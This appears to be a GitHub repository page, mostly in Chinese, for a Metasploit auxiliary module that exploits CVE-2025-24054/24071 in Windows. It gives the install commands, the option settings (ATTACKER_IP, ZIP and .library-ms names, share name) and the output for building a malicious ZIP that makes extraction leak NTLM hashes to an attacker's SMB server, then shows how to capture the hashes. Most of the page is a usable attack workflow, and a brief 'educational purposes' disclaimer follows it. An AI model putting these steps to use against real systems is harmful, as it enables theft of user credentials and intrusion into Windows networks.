SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module

GitHub: SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module

这是一个针对 CVE-2025-24054 漏洞的 Metasploit 辅助模块,通过生成特制的 .library-ms 文件在 Windows 解压过程中自动触发 NTLM 哈希泄露。

Stars: 0 | Forks: 0

# CVE-2025-24054/24071 - Metasploit 模块 ## 概述 该漏洞发生在 `.zip` 文件的解压过程中。当与特制的 `.library-ms` 文件交互时,Windows 资源管理器会处理内部 XML 架构,并自动向攻击者控制的远程路径发起 SMB 认证请求。 此行为允许泄露用户的 NTLM 哈希,且除了解压文件外,无需任何额外的交互。要查看概念验证,我建议访问以下链接:[Fluffy - HTB](https://securitylayer.gitbook.io/securitylayer/maquinas-y-modulos-de-htb/windows-easy/fluffy)。 ## ⚠️ 关键说明: 虽然该漏洞最初被披露为 CVE-2025-24071,但目前官方追踪编号为 CVE-2025-24054。 ## 📌 安装 克隆仓库: ``` ❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git ❯ cd CVE-2025-24071 ``` 将模块复制到 Metasploit 目录: ``` ❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/ ``` 如果目录不存在,请使用以下命令创建: ``` ❯ mkdir -p ~/.msf4/modules/auxiliary/server/ ``` 然后再次复制模块。 ## 📌 使用 启动 Metasploit 并加载模块: ``` ❯ msfconsole -q ❯ use auxiliary/server/ntlm_hash_leak ``` 如果模块加载成功,你将看到配置选项: ``` ❯ show options Module options (auxiliary/server/ntlm_hash_leak):    Name          Current Setting       Required  Description    ----          ---------------       --------  -----------    ATTACKER_IP                         yes       IP del atacante (donde corre Responder/Impacket)    FILENAME      exploit.zip           yes       El nombre del archivo ZIP    LIBRARY_NAME  documents.library-ms  yes       Nombre del archivo .library-ms    SHARE_NAME    recurso               yes       Nombre del recurso compartido ficticio ``` 配置模块并运行: ``` ❯ set ATTACKER_IP 0.0.0.0  # Reemplaza con tu IP atacante ❯ set FILENAME exploit.zip # Nombre del payload que subiras al SMB (equipo objetivo) ❯ set LIBRARY_NAME malicious.library-ms  # Nombre de .library-ms file ❯ set SHARE_NAME it_shared # Nombre del recurso SMB ❯ run ``` 输出:该模块会生成一个 `.zip` 文件,该文件需要上传到目标 SMB 服务器,以便受害者随后执行。 ``` [+] exploit.zip stored at /home/user/.msf4/local/exploit.zip [+] Archivo guardado en: /home/user/.msf4/local/exploit.zip [*] Auxiliary module execution completed ``` 最后,使用 Metasploit 的 SMB 捕获模块来接收 NTLM 哈希: ``` ❯ use auxiliary/server/capture/smb ❯ set SRVHOST 0.0.0.0 # Reemplaza con tu IP atacante ❯ run ``` **如果你在从 Metasploit 启动 SMB 服务器时遇到问题:** - 以 root 身份运行 msfconsole - 确保 ntlm_hash_leak.rb 文件具有适当的权限供 root 访问 ## ⚠️ 警告 此模块仅出于教育目的和授权测试而开发。 未经授权使用此类工具可能是非法的。 ## 🕷 作者 Security Layer
标签:CVE-2025-24054, CVE-2025-24071, Impacket, Metasploit 模块, NTLM 哈希泄露, Responder, Ruby, SMB 认证, Windows 漏洞, Zip 文件解压, 中间人攻击, 文件格式漏洞, 知识库, 网络安全, 资源劫持, 辅助模块, 防御绕过, 隐私保护